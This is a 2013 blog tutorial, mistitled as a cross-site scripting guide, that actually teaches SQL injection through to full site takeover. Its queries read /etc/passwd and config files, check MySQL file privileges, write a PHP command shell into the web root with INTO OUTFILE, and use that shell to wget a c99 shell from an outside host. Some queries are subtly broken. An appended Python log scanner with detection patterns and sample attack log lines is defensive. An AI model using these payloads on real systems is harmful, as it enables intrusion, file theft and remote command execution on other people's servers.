Thursday 25 July 2013


Cross Site Scripting (XSS) Tutorial
First of all, find a website that is vulnerable to SQL injection; you can find websites by dorks or manually XD, like I have found this one.

You need 2 main things:
1) Root path of the website
2) A writable directory
If the vulnerable website doesn't show the root path, then don't worry, I will tell you how to find the root path. :D
And also the writable directory.

www.site.com/index.php?id=10'


I am not starting with the ABC of SQLi; I hope you know the basics :D
Now we have to find the columns of the website and then the vulnerable columns. Like my site has 5 columns and 3 is the vulnerable column.

www.site.com/index.php?id=-10 UniOn SeleCt 1,2,3,4,5--

www.site.com/index.php?id=-10 UniOn SeleCt 1,2,version(),4,5--

Let's try to load files of the website:

www.site.com/index.php?id=-10 UniOn SeleCt 1,2,load_file('/etc/passwd'),4,5--
www.site.com/index.php?id=-10 UniOn SeleCt 1,2,load_file('/etc/my.cnf'),4,5--
www.site.com/index.php?id=-10 UniOn SeleCt 1,2,load_file('/etc/group'),4,5--
www.site.com/index.php?id=-10 UniOn SeleCt 1,2,load_file('/etc/services'),4,5--
www.site.com/index.php?id=-10 UniOn SeleCt 1,2,load_file('/etc/hosts'),4,5--

We won't need to read any of the files mentioned above; they are just to increase your knowledge :D
Now we have to check the file privilege for the current user. For this, first you have to find the current username,
like this:

www.site.com/index.php?id=-10 UniOn SeleCt 1,2,current_user,4,5--

Our current username is etc; mine is Ch3rn0by1.
Now check file privileges for user Ch3rn0by1:

www.site.com/index.php?id=-10 UniOn SeleCt 1,2,file_priv,4,5 FROM mysql.user WHERE user='Ch3rn0by1'--

If it shows Y (yes) in the vulnerable column of the website, that means we have the file privilege for the current user Ch3rn0by1.
And if it doesn't show Y, then don't waste your time there :D

OK, now we have to know the root path :D. For this we have to know the software which is used on the server.
You can use Havij and etc/passwd and many more softwares (etc/passwd isn't a software LOL).
To know the server software by the file etc/passwd, use this query:

www.site.com/index.php?id=-10 UniOn SeleCt 1,2,3,load_file('etc/passwd'),5--

Now we have our server software, etc. (/home/Ch3rn0by1).
Now read one more file:

www.site.com/index.php?id=-10 UniOn SeleCt 1,2,load_file('etc/Ch3rn0by1.conf')4,5--

Where Ch3rn0by1 is your server software name, like servername.conf :D

Now we have the root path:

/home/site.com/public_html etc.

Now we have to find a writable directory. For this you can use Google dorks as well, and your knowledge too :D

site www.site.com/dir/*/*/*/*/

So it's site.com/ch3rn0by1/writeable

Now we will upload our evil code:

www.site.com/index.php?id=10 UniOn SeleCt 1,2,"<?system($_REQUEST['cmd']);?>",4,5 into outfile '/home/site/public_html/Ch3rn0by1/writeable directory/Ch3rn0by1.php'--+
OK, now we have to execute our commands:
www.site.com/Ch3rn0by1/writeable directory/Ch3rn0by1.php?cmd=pwd
www.site.com/Ch3rn0by1/writeable directory/Ch3rn0by1.php?cmd=uname -a

Now we will use the wget command to upload our evil script:

www.site.com/Ch3rn0by1/writeable directory/Ch3rn0by1.php?cmd=wget http://www.shellsite.com/c99.txt

Now we will rename our c99.txt to .php in order to execute it :D

www.site.com/Ch3rn0by1/writeable directory/Ch3rn0by1.php?cmd=mv c99.txt c99.php

Now open it:

www.site.com/Ch3rn0by1/writeable directory/c99.php

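Every stage of the walkthrough above (the load_file reads, the mysql.user/file_priv check and the INTO OUTFILE write) leaves a distinctive request in the web server's access log, and the mixed-case UniOn SeleCt and --+ tricks only defeat filters that do not decode and normalize first. As an added example that is not part of the original post, the Python scanner below normalizes each request target and labels those stages; the log lines are constructed sample data, not real traffic.

```python
import re
from urllib.parse import unquote_plus

# Constructed combined-format access-log lines replaying the post's stages (sample data, not real traffic).
SAMPLE_LOG = """\
203.0.113.7 - - [25/Jul/2013:10:01:09 +0000] "GET /index.php?id=10%27 HTTP/1.1" 500 312
203.0.113.7 - - [25/Jul/2013:10:02:31 +0000] "GET /index.php?id=-10%20UniOn%20SeleCt%201,2,load_file(%27/etc/passwd%27),4,5-- HTTP/1.1" 200 7801
203.0.113.7 - - [25/Jul/2013:10:03:15 +0000] "GET /index.php?id=-10%20UniOn%20SeleCt%201,2,file_priv,4,5%20FROM%20mysql.user%20WHERE%20user=%27x%27-- HTTP/1.1" 200 5122
203.0.113.7 - - [25/Jul/2013:10:04:40 +0000] "GET /index.php?id=10%20UniOn%20SeleCt%201,2,%22%3C?system($_REQUEST[%27cmd%27]);?%3E%22,4,5%20into%20outfile%20%27/home/site/public_html/up/x.php%27--+ HTTP/1.1" 200 5120
198.51.100.9 - - [25/Jul/2013:10:05:00 +0000] "GET /index.php?id=42 HTTP/1.1" 200 5120
"""

REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3})')

# Ordered from most to least severe; the first pattern that matches labels the request.
SIGNATURES = [
    ("file_write",   re.compile(r"\binto\s+(?:out|dump)file\b", re.I)),
    ("file_read",    re.compile(r"\bload_file\s*\(", re.I)),
    ("priv_enum",    re.compile(r"\bmysql\.user\b|\bfile_priv\b", re.I)),
    ("union_select", re.compile(r"\bunion\b(?:\s+all)?\s+select\b", re.I)),
]

def normalize(target: str) -> str:
    """URL-decode twice (undoes double encoding), turn '+' and /**/ comments into spaces
    and collapse whitespace, so spacing tricks cannot hide from the case-insensitive patterns."""
    decoded = unquote_plus(unquote_plus(target))
    decoded = re.sub(r"/\*.*?\*/", " ", decoded)
    return re.sub(r"\s+", " ", decoded)

def classify(target: str):
    """Label of the most severe signature found in the request target, or None."""
    query = normalize(target)
    for label, pattern in SIGNATURES:
        if pattern.search(query):
            return label
    return None

def scan_access_log(text: str):
    """One (client_ip, status, label, decoded_target) tuple per flagged request, in log order."""
    findings = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        ip, target, status = m.groups()
        label = classify(target)
        if label:
            findings.append((ip, int(status), label, normalize(target)))
    return findings
```

On the sample, scan_access_log(SAMPLE_LOG) returns three findings labelled file_read, priv_enum and file_write from the same client, which together are the whole chain the post describes. The lone-quote probe that produced the 500 is not matched by these signatures, so error-status spikes per client are worth a separate alert.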
Thanks